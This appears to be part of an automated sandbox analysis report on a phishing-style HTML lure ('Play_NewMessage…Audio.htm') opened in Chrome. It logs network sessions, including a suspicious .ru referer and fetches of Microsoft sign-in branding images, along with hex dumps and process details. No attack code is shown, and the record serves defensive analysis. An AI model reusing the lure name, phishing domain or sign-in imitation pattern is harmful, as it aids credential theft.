                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                              Referer: https://2r1.nhvw4is.ru/
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:35 UTC616INHTTP/1.1 200 OK
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                              Age: 9323
                                                                                                                                                              Cache-Control: public, max-age=86400
                                                                                                                                                              Content-MD5: 9rfswK7B/Hg2MNmoZdV5wQ==
                                                                                                                                                              Content-Type: image/*
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:35 GMT
                                                                                                                                                              Etag: 0x8D4F9F2178A83D3
                                                                                                                                                              Last-Modified: Tue, 12 Sep 2017 15:22:33 GMT
                                                                                                                                                              Server: ECAcc (nya/788E)
                                                                                                                                                              X-Cache: HIT
                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                              x-ms-request-id: 01e64c9f-301e-004a-674e-49e06d000000
                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                              Content-Length: 4076
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:39:35 UTC4076INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 12 0c 0d 10 0d 0b 12 10 0e 10 14 13 12 15 1b 2c 1d 1b 18 18 1b 36 27 29 20 2c 40 39 44 43 3f 39 3e 3d 47 50 66 57 47 4b 61 4d 3d 3e 59 79 5a 61 69 6d 72 73 72 45 55 7d 86 7c 6f 85 66 70 72 6e 01 13 14 14 1b 17 1b 34 1d 1d 34 6e 49 3e 49 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e ff c0 00 11 08 00 3a 01 18 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                              Data Ascii: JFIF,6') ,@9DC?9>=GPfWGKaM=>YyZaimrsrEU}|ofprn44nI>Innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:}!1AQa"q2#BR


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              57192.168.2.449819152.199.4.734434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:35 UTC454OUTGET /dbd5a2dd-ycck-qdgvaobjxiczh0sbj8queqtpxrg5wachki5wdu/logintenantbranding/0/bannerlogo?ts=636408265539890963 HTTP/1.1
                                                                                                                                                              Host: aadcdn.msauthimages.net
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              2024-01-17 16:39:35 UTC616INHTTP/1.1 200 OK
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                              Age: 9323
                                                                                                                                                              Cache-Control: public, max-age=86400
                                                                                                                                                              Content-MD5: 9rfswK7B/Hg2MNmoZdV5wQ==
                                                                                                                                                              Content-Type: image/*
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:35 GMT
                                                                                                                                                              Etag: 0x8D4F9F2178A83D3
                                                                                                                                                              Last-Modified: Tue, 12 Sep 2017 15:22:33 GMT
                                                                                                                                                              Server: ECAcc (nya/788E)
                                                                                                                                                              X-Cache: HIT
                                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                                              x-ms-request-id: 01e64c9f-301e-004a-674e-49e06d000000
                                                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                                                              Content-Length: 4076
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:39:35 UTC4076INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 12 0c 0d 10 0d 0b 12 10 0e 10 14 13 12 15 1b 2c 1d 1b 18 18 1b 36 27 29 20 2c 40 39 44 43 3f 39 3e 3d 47 50 66 57 47 4b 61 4d 3d 3e 59 79 5a 61 69 6d 72 73 72 45 55 7d 86 7c 6f 85 66 70 72 6e 01 13 14 14 1b 17 1b 34 1d 1d 34 6e 49 3e 49 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e 6e ff c0 00 11 08 00 3a 01 18 03 01 11 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                              Data Ascii: JFIF,6') ,@9DC?9>=GPfWGKaM=>YyZaimrsrEU}|ofprn44nI>Innnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn:}!1AQa"q2#BR


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              58192.168.2.44982352.165.165.26443
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:39:54 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=dGeXFcO742e+8lY&MD=v78ASCbe HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Accept: */*
                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                              2024-01-17 16:39:54 UTC560INHTTP/1.1 200 OK
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Pragma: no-cache
                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                              Expires: -1
                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                                                              MS-CorrelationId: abec0b5a-66d5-403c-8c19-c29edbdfc317
                                                                                                                                                              MS-RequestId: db58f189-8b2b-4b92-bd06-7f934dd37c5c
                                                                                                                                                              MS-CV: 8jsvm00ASECKEH/N.0
                                                                                                                                                              X-Microsoft-SLSClientCache: 2160
                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:39:54 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Length: 25457
                                                                                                                                                              2024-01-17 16:39:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                                                                                                                              Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                                                                                                                              2024-01-17 16:39:54 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                                                                                                                              Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              59192.168.2.449826142.250.81.2384434520C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              2024-01-17 16:40:27 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000089B3D0D603 HTTP/1.1
                                                                                                                                                              Host: clients1.google.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                              2024-01-17 16:40:27 UTC817INHTTP/1.1 200 OK
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-7beQpQIYncB1cwosmxy17w' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CrTWWqeWS9AqFh7Hfecdww' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                              Content-Length: 220
                                                                                                                                                              Date: Wed, 17 Jan 2024 16:40:27 GMT
                                                                                                                                                              Expires: Wed, 17 Jan 2024 16:40:27 GMT
                                                                                                                                                              Cache-Control: private, max-age=0
                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                              Server: GSE
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Connection: close
                                                                                                                                                              2024-01-17 16:40:27 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 43 41 31 30 39 33 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 38 33 34 66 32 62 61 30 0a
                                                                                                                                                              Data Ascii: rlzC1: 1C1ONGR_enCA1093rlzC2: 1C2ONGR_enCA1093rlzC7: 1C7ONGR_enCA1093dcc: set_dcc: C1:1C1ONGR_enCA1093,C2:1C2ONGR_enCA1093,C7:1C7ONGR_enCA1093events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: 834f2ba0


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:17:38:52
                                                                                                                                                              Start date:17/01/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Play_NewMessage_17Jan2024_Audio.htm
                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:17:38:56
                                                                                                                                                              Start date:17/01/2024
                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=2020,i,7882445477630509628,3060162036037396328,262144 /prefetch:8
                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              No disassembly